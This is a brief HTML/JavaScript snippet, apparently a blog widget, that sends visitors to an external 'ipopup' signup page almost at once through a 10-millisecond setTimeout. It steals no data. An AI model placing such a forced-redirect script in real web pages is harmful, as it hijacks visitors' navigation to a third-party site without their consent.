<script language="Javascript">
<!--
// please keep these lines on when you copy the source
// made by: mohairan . - http://ake1365.blogfa.com/uto2
var URL   = "http://v2.ipopup.ir/user/signup"
var speed = 10
function reload() {
location = URL
}
setTimeout("reload()", speed);
//-->
</script>
<!-- 
                                                                                                                                                                                                                                                                                                                     
--> 
